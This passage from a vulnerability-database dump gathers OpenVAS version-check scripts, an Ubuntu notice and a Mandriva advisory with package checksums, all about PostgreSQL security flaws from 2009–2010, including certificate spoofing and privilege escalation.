E-Soft Inc. http://www.securityspace.com", "published": "2009-12-30T00:00:00", "title": "FreeBSD Ports: postgresql-client, postgresql-server", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "FreeBSD Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-6600", "CVE-2009-2408", "CVE-2009-3230", "CVE-2009-4034", "CVE-2009-4136"], "modified": "2016-12-23T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=66611", "id": "OPENVAS:66611", "sourceData": "#\n#VID e7bc5600-eaa0-11de-bd9c-00215c6a37bb\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from VID e7bc5600-eaa0-11de-bd9c-00215c6a37bb\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The following packages are affected:\n postgresql-client\n postgresql-server\n\nCVE-2009-4034\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before\n8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before\n8.4.2 does not properly handle a '\\0' character in a domain name in\nthe subject's Common Name (CN) field of an X.509 certificate, which\n(1) allows man-in-the-middle attackers to spoof arbitrary SSL-based\nPostgreSQL servers via a crafted server certificate issued by a\nlegitimate Certification Authority, and (2) allows remote attackers to\nbypass intended client-hostname restrictions via a crafted client\ncertificate issued by a legitimate Certification Authority, a related\nissue to CVE-2009-2408.\n\nCVE-2009-4136\nPostgreSQL 7.4.x before 7.4.27, 8.0.x before 8.0.23, 8.1.x before\n8.1.19, 8.2.x before 8.2.15, 8.3.x before 8.3.9, and 8.4.x before\n8.4.2 does not properly manage session-local state during execution of\nan index function by a database superuser, which allows remote\nauthenticated users to gain privileges via a table with crafted index\nfunctions, as demonstrated by functions that modify (1) search_path or\n(2) a prepared statement, a related issue to CVE-2007-6600 and\nCVE-2009-3230.\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory.\";\n\ntag_solution = \"Update your system with the appropriate patches or\nsoftware upgrades.\";\n\nif(description)\n{\n script_id(66611);\n script_version(\"$Revision: 4847 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-12-23 10:33:16 +0100 (Fri, 23 Dec 2016) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"FreeBSD Ports: postgresql-client, postgresql-server\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"FreeBSD Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdrel\", \"login/SSH/success\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\n\ntxt = \"\";\nvuln = 0;\nbver = portver(pkg:\"postgresql-client\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.4\")>=0 && revcomp(a:bver, b:\"7.4.27\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.0\")>=0 && revcomp(a:bver, b:\"8.0.23\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.1\")>=0 && revcomp(a:bver, b:\"8.1.19\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.2\")>=0 && revcomp(a:bver, b:\"8.2.15\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.3\")>=0 && revcomp(a:bver, b:\"8.3.9\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.4\")>=0 && revcomp(a:bver, b:\"8.4.2\")<0) {\n txt += 'Package postgresql-client version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nbver = portver(pkg:\"postgresql-server\");\nif(!isnull(bver) && revcomp(a:bver, b:\"7.4\")>=0 && revcomp(a:bver, b:\"7.4.27\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.0\")>=0 && revcomp(a:bver, b:\"8.0.23\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.1\")>=0 && revcomp(a:bver, b:\"8.1.19\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.2\")>=0 && revcomp(a:bver, b:\"8.2.15\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.3\")>=0 && revcomp(a:bver, b:\"8.3.9\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\nif(!isnull(bver) && revcomp(a:bver, b:\"8.4\")>=0 && revcomp(a:bver, b:\"8.4.2\")<0) {\n txt += 'Package postgresql-server version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = 1;\n}\n\nif(vuln) {\n security_message(data:string(txt));\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-15T11:57:51", "references": ["http://lists.centos.org/pipermail/centos-announce/2010-May/016640.html", "2010:0427"], "pluginID": "880398", "description": "Check for the Version of rh-postgresql", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-05-28T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "title": "CentOS Update for rh-postgresql CESA-2010:0427 centos3 i386", "type": "openvas", "naslFamily": "CentOS Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2010-1170", "CVE-2010-1169", "CVE-2010-0442", "CVE-2010-0733", "CVE-2009-4136"], "modified": "2017-12-15T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=880398", "id": "OPENVAS:880398", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for rh-postgresql CESA-2010:0427 centos3 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PostgreSQL is an advanced object-relational database management system\n (DBMS). PL/Perl and PL/Tcl allow users to write PostgreSQL functions in the\n Perl and Tcl languages, and are installed in trusted mode by default. In\n trusted mode, certain operations, such as operating system level access,\n are restricted.\n\n A flaw was found in the way PostgreSQL enforced permission checks on\n scripts written in PL/Perl. If the PL/Perl procedural language was\n registered on a particular database, an authenticated database user running\n a specially-crafted PL/Perl script could use this flaw to bypass intended\n PL/Perl trusted mode restrictions, allowing them to run arbitrary Perl\n scripts with the privileges of the database server. (CVE-2010-1169)\n \n Red Hat would like to thank Tim Bunce for responsibly reporting the\n CVE-2010-1169 flaw.\n \n A flaw was found in the way PostgreSQL enforced permission checks on\n scripts written in PL/Tcl. If the PL/Tcl procedural language was registered\n on a particular database, an authenticated database user running a\n specially-crafted PL/Tcl script could use this flaw to bypass intended\n PL/Tcl trusted mode restrictions, allowing them to run arbitrary Tcl\n scripts with the privileges of the database server. (CVE-2010-1170)\n \n A buffer overflow flaw was found in the way PostgreSQL retrieved a\n substring from the bit string for BIT() and BIT VARYING() SQL data types.\n An authenticated database user running a specially-crafted SQL query could\n use this flaw to cause a temporary denial of service (postgres daemon\n crash) or, potentially, execute arbitrary code with the privileges of the\n database server. (CVE-2010-0442)\n \n An integer overflow flaw was found in the way PostgreSQL used to calculate\n the size of the hash table for joined relations. An authenticated database\n user could create a specially-crafted SQL query which could cause a\n temporary denial of service (postgres daemon crash) or, potentially,\n execute arbitrary code with the privileges of the database server.\n (CVE-2010-0733)\n \n PostgreSQL improperly protected session-local state during the execution of\n an index function by a database superuser during the database maintenance\n operations. An authenticated database user could use this flaw to elevate\n their privileges via specially-crafted index functions. (CVE-2009-4136)\n \n All PostgreSQL users are advised to upgrade to these updated packages,\n which contain backported patches to correct these issues. Running\n PostgreSQL instances must be restarted ("service rhdb restart") for this\n update to take effect.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\ntag_affected = \"rh-postgresql on CentOS 3\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2010-May/016640.html\");\n script_id(880398);\n script_version(\"$Revision: 8130 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-15 07:31:09 +0100 (Fri, 15 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-05-28 10:00:59 +0200 (Fri, 28 May 2010)\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2010:0427\");\n script_cve_id(\"CVE-2009-4136\", \"CVE-2010-0442\", \"CVE-2010-0733\", \"CVE-2010-1169\", \"CVE-2010-1170\");\n script_name(\"CentOS Update for rh-postgresql CESA-2010:0427 centos3 i386\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of rh-postgresql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS3\")\n{\n\n if ((res = isrpmvuln(pkg:\"rh-postgresql\", rpm:\"rh-postgresql~7.3.21~3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rh-postgresql-contrib\", rpm:\"rh-postgresql-contrib~7.3.21~3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rh-postgresql-devel\", rpm:\"rh-postgresql-devel~7.3.21~3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rh-postgresql-docs\", rpm:\"rh-postgresql-docs~7.3.21~3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rh-postgresql-jdbc\", rpm:\"rh-postgresql-jdbc~7.3.21~3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rh-postgresql-libs\", rpm:\"rh-postgresql-libs~7.3.21~3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rh-postgresql-pl\", rpm:\"rh-postgresql-pl~7.3.21~3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rh-postgresql-python\", rpm:\"rh-postgresql-python~7.3.21~3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rh-postgresql-server\", rpm:\"rh-postgresql-server~7.3.21~3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rh-postgresql-tcl\", rpm:\"rh-postgresql-tcl~7.3.21~3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"rh-postgresql-test\", rpm:\"rh-postgresql-test~7.3.21~3\", rls:\"CentOS3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:08:24", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4136", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4034"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "8.10", "packageVersion": "8.3.9-0ubuntu8.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "postgresql-8.3", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "8.3.9-0ubuntu9.04", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "postgresql-8.3", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "8.1.19-0ubuntu0.6.06", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "postgresql-8.1", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "8.3.9-0ubuntu8.04", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "postgresql-8.3", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "8.4.2-0ubuntu9.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "postgresql-8.4", "operator": "lt"}], "description": "It was discovered that PostgreSQL did not properly handle certificates with NULL characters in the Common Name field of X.509 certificates. An attacker could exploit this to perform a man in the middle attack to view sensitive information or alter encrypted communications. (CVE-2009-4034)\n\nIt was discovered that PostgreSQL did not properly manage session-local state. A remote authenticated user could exploit this to escalate priviliges within PostgreSQL. (CVE-2009-4136)", "edition": 3, "reporter": "Ubuntu", "published": "2010-01-03T00:00:00", "title": "PostgreSQL vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2010-01-03T00:00:00", "id": "USN-876-1", "href": "https://usn.ubuntu.com/876-1/", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:35", "references": ["https://vulners.com/securityvulns/securityvulns:doc:22944"], "description": "SSL certificate spoofing, privilege escalation.", "edition": 1, "reporter": "BUGTRAQ", "published": "2009-12-15T00:00:00", "title": "PostgreSQL multiple security vulnerabilities", "type": "securityvulns", "enchantments": {"score": {"modified": "2018-08-31T11:09:35", "vector": "NONE", "value": 9.3}}, "bulletinFamily": "software", "affectedSoftware": [{"name": "PostgreSQL", "version": "8.3", "operator": "eq"}], "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2009-12-15T00:00:00", "id": "SECURITYVULNS:VULN:10473", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10473", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:32", "references": [], "description": "\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n _______________________________________________________________________\r\n\r\n Mandriva Linux Security Advisory MDVSA-2009:333\r\n http://www.mandriva.com/security/\r\n _______________________________________________________________________\r\n\r\n Package : postgresql\r\n Date : December 15, 2009\r\n Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 3.0, Corporate 4.0,\r\n Enterprise Server 5.0\r\n _______________________________________________________________________\r\n\r\n Problem Description:\r\n\r\n Multiple vulnerabilities was discovered and corrected in postgresql:\r\n \r\n NULL Bytes in SSL Certificates can be used to falsify client or server\r\n authentication. This only affects users who have SSL enabled, perform\r\n certificate name validation or client certificate authentication,\r\n and where the Certificate Authority (CA) has been tricked into\r\n issuing invalid certificates. The use of a CA that can be trusted to\r\n always issue valid certificates is recommended to ensure you are not\r\n vulnerable to this issue (CVE-2009-4034).\r\n \r\n Privilege escalation via changing session state in an index\r\n function. This closes a corner case related to vulnerabilities\r\n CVE-2009-3230 and CVE-2007-6600 (CVE-2009-4136).\r\n \r\n Packages for 2008.0 are being provided due to extended support for\r\n Corporate products.\r\n \r\n This update provides a solution to these vulnerabilities.\r\n _______________________________________________________________________\r\n\r\n References:\r\n\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4034\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4136\r\n http://www.postgresql.org/support/security\r\n _______________________________________________________________________\r\n\r\n Updated Packages:\r\n\r\n Mandriva Linux 2008.0:\r\n 7a4134b7ab1675be4c53ff6b4922d7e0 2008.0/i586/libecpg5-8.2.15-0.1mdv2008.0.i586.rpm\r\n b8fe1351d19899fbca1a67929b0b4be7 2008.0/i586/libecpg-devel-8.2.15-0.1mdv2008.0.i586.rpm\r\n e86a98de348ba90bc6a1f16f02daa6e1 2008.0/i586/libpq5-8.2.15-0.1mdv2008.0.i586.rpm\r\n 551363cff118bee0b87dd827dddce669 2008.0/i586/libpq-devel-8.2.15-0.1mdv2008.0.i586.rpm\r\n ef3c1b9a831fedf1399f8b72cd65f748 2008.0/i586/postgresql-8.2.15-0.1mdv2008.0.i586.rpm\r\n d308631e61cd6236e40827b78c9c2951 2008.0/i586/postgresql8.2-8.2.15-0.1mdv2008.0.i586.rpm\r\n f8e97d697f69e43dc4bb2a96e64600cd 2008.0/i586/postgresql8.2-contrib-8.2.15-0.1mdv2008.0.i586.rpm\r\n 863015525b015c812f963a2af63fc7dd 2008.0/i586/postgresql8.2-devel-8.2.15-0.1mdv2008.0.i586.rpm\r\n 6340e0530e254732d654d8f6211d5198 2008.0/i586/postgresql8.2-docs-8.2.15-0.1mdv2008.0.i586.rpm\r\n e098dee5477edb0b7549b65ddb440cb5 2008.0/i586/postgresql8.2-pl-8.2.15-0.1mdv2008.0.i586.rpm\r\n 05cda82443737a12c7c8c3622e762618 2008.0/i586/postgresql8.2-plperl-8.2.15-0.1mdv2008.0.i586.rpm\r\n 6a66bc2cc80538a4db3e44ca97740a7f 2008.0/i586/postgresql8.2-plpgsql-8.2.15-0.1mdv2008.0.i586.rpm\r\n d01866d6fa8d18865e8f47744d0053bd 2008.0/i586/postgresql8.2-plpython-8.2.15-0.1mdv2008.0.i586.rpm\r\n 0e250c776673c8595ed4f57194ceff15 2008.0/i586/postgresql8.2-pltcl-8.2.15-0.1mdv2008.0.i586.rpm\r\n f69196c2af80f25abaae6cdb5273a985 2008.0/i586/postgresql8.2-server-8.2.15-0.1mdv2008.0.i586.rpm\r\n 5c96b2bdfdb5f4b23280de184d76bb4c 2008.0/i586/postgresql8.2-test-8.2.15-0.1mdv2008.0.i586.rpm\r\n 6c203c33bef69b8f676d1acd782d3526 2008.0/i586/postgresql-devel-8.2.15-0.1mdv2008.0.i586.rpm \r\n 37b86e7869ce8ef7621eb5f2fbeb9804 2008.0/SRPMS/postgresql8.2-8.2.15-0.1mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2008.0/X86_64:\r\n ef654ee6768a32df7021cb7c1b95151d 2008.0/x86_64/lib64ecpg5-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 4272c2616fce89a650e102effb3e2427 2008.0/x86_64/lib64ecpg-devel-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n a45cc8104b4758913384375c6f9d993b 2008.0/x86_64/lib64pq5-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n a5beab729e5e4c04374f44b8ed0e7c0d 2008.0/x86_64/lib64pq-devel-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n bc9a43e16b3fe38c26011f76e6e796ea 2008.0/x86_64/postgresql-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 632cc2bd4f2d099de6f18cc5a4ed28b9 2008.0/x86_64/postgresql8.2-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n da76130aeaec4d962904ed0c2c566c63 2008.0/x86_64/postgresql8.2-contrib-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 9061e32e63cc8dfc68a393dc986b6b92 2008.0/x86_64/postgresql8.2-devel-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 2d88f5b268d6661771fd76eccbca7f82 2008.0/x86_64/postgresql8.2-docs-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 46a1f1beb87d1a3618470b5a1427b53d 2008.0/x86_64/postgresql8.2-pl-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n a8126282c514a3b22736c6bf2d3ca570 2008.0/x86_64/postgresql8.2-plperl-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 5aada115ff9cd3c44cd9032d88bd93c4 2008.0/x86_64/postgresql8.2-plpgsql-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 4c9433b70a16300a304ee04b3aeb7abe 2008.0/x86_64/postgresql8.2-plpython-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n cf01e27ebed1d7541c7dfe9fe7eaec20 2008.0/x86_64/postgresql8.2-pltcl-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 16fe157d591066b6c7bd12ef79c78972 2008.0/x86_64/postgresql8.2-server-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n c5b58224e6becb9334cd555747fd040e 2008.0/x86_64/postgresql8.2-test-8.2.15-0.1mdv2008.0.x86_64.rpm\r\n 0e826718d8fe8571618ffdff6304b9d9 2008.0/x86_64/postgresql-devel-8.2.15-0.1mdv2008.0.x86_64.rpm \r\n 37b86e7869ce8ef7621eb5f2fbeb9804 2008.0/SRPMS/postgresql8.2-8.2.15-0.1mdv2008.0.src.rpm\r\n\r\n Mandriva Linux 2009.0:\r\n eb4c7ac210259c34ce96873fa11cdd7b 2009.0/i586/libecpg8.3_6-8.3.9-0.1mdv2009.0.i586.rpm\r\n ea79f082d51e575072e22e3f37705e76 2009.0/i586/libpq8.3_5-8.3.9-0.1mdv2009.0.i586.rpm\r\n 21dda67f89a7291aa530bdc0b04b3893 2009.0/i586/postgresql8.3-8.3.9-0.1mdv2009.0.i586.rpm\r\n 09d1a7d4bcad3b754772e03bfdd85768 2009.0/i586/postgresql8.3-contrib-8.3.9-0.1mdv2009.0.i586.rpm\r\n ec004d65e57abb94a1c40ebd0e8b0a24 2009.0/i586/postgresql8.3-devel-8.3.9-0.1mdv2009.0.i586.rpm\r\n cae8230c899fd71fd28fc3baaa983e95 2009.0/i586/postgresql8.3-docs-8.3.9-0.1mdv2009.0.i586.rpm\r\n e9a46436f40e44e2b4757b6ee2db2dc3 2009.0/i586/postgresql8.3-pl-8.3.9-0.1mdv2009.0.i586.rpm\r\n edc0dcc12a27a2166f8e14f147f8540d 2009.0/i586/postgresql8.3-plperl-8.3.9-0.1mdv2009.0.i586.rpm\r\n 1c8b6afc908d4e0037085b2b275b0893 2009.0/i586/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.0.i586.rpm\r\n f0a4b90047b26f6de9c0c5475ede00e8 2009.0/i586/postgresql8.3-plpython-8.3.9-0.1mdv2009.0.i586.rpm\r\n 1bbd1b65ed0b65a62963eaccb8008666 2009.0/i586/postgresql8.3-pltcl-8.3.9-0.1mdv2009.0.i586.rpm\r\n 27124329934314f3f73571e83e5fdaf3 2009.0/i586/postgresql8.3-server-8.3.9-0.1mdv2009.0.i586.rpm \r\n 9af04397316050caeeb767c2e53db8da 2009.0/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.0/X86_64:\r\n 6aa7262c7041f8fb039a8031965a6a71 2009.0/x86_64/lib64ecpg8.3_6-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 61af7c606839a7fff0ff56991dfd7021 2009.0/x86_64/lib64pq8.3_5-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 2ff4745b162e6b4234862b1b2fcd315f 2009.0/x86_64/postgresql8.3-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 50d9eaffaf04beea769d22e058a1f2a8 2009.0/x86_64/postgresql8.3-contrib-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n d9fe796fce569179e8e99ae74a63af76 2009.0/x86_64/postgresql8.3-devel-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 980a800e9ac2a0890d24ae0e843fd6e0 2009.0/x86_64/postgresql8.3-docs-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 27334694d9da6e19904c8198d7f6ef43 2009.0/x86_64/postgresql8.3-pl-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 68f2566b2de77da452d4b8043cf8a0de 2009.0/x86_64/postgresql8.3-plperl-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 31c3643e58947d76207345d8e82a6483 2009.0/x86_64/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 8e342cf436ed4bd6ea61244bca980054 2009.0/x86_64/postgresql8.3-plpython-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n 30ba385a932cf752cfd85dd3a0833c40 2009.0/x86_64/postgresql8.3-pltcl-8.3.9-0.1mdv2009.0.x86_64.rpm\r\n e1253c9933f47db51ecd7edc825a703e 2009.0/x86_64/postgresql8.3-server-8.3.9-0.1mdv2009.0.x86_64.rpm \r\n 9af04397316050caeeb767c2e53db8da 2009.0/SRPMS/postgresql8.3-8.3.9-0.1mdv2009.0.src.rpm\r\n\r\n Mandriva Linux 2009.1:\r\n 91a80a39b17253f9321f325979afff81 2009.1/i586/libecpg8.3_6-8.3.9-0.1mdv2009.1.i586.rpm\r\n 7b27f7064a9b75d50d54e3d782ccea54 2009.1/i586/libpq8.3_5-8.3.9-0.1mdv2009.1.i586.rpm\r\n 62da0a6d0030c98fd608a33fb123456c 2009.1/i586/postgresql8.3-8.3.9-0.1mdv2009.1.i586.rpm\r\n 7c7dede7142fd2e3ed2ebdb3c519b623 2009.1/i586/postgresql8.3-contrib-8.3.9-0.1mdv2009.1.i586.rpm\r\n 345e475a35916f7416d4f8b0bf75436b 2009.1/i586/postgresql8.3-devel-8.3.9-0.1mdv2009.1.i586.rpm\r\n 97a70a0872a839f83a2739eaed6607a9 2009.1/i586/postgresql8.3-docs-8.3.9-0.1mdv2009.1.i586.rpm\r\n 0eed7e9ebefdddcaf27e42d33629dabf 2009.1/i586/postgresql8.3-pl-8.3.9-0.1mdv2009.1.i586.rpm\r\n 61952d53ebee9a18a5cf9a10988c4fa3 2009.1/i586/postgresql8.3-plperl-8.3.9-0.1mdv2009.1.i586.rpm\r\n 9cdd01198d4d25ef569cc081c411c050 2009.1/i586/postgresql8.3-plpgsql-8.3.9-0.1mdv2009.1.i586.rpm\r\n 7b9ba830df3a61827eab05cfada3f09b 2009.1/i586/postgresql8.3-plpython-8.3.9-0.1mdv2009.1.i586.rpm\r\n 42fb3e9486162d383bc67d24eb613b1f 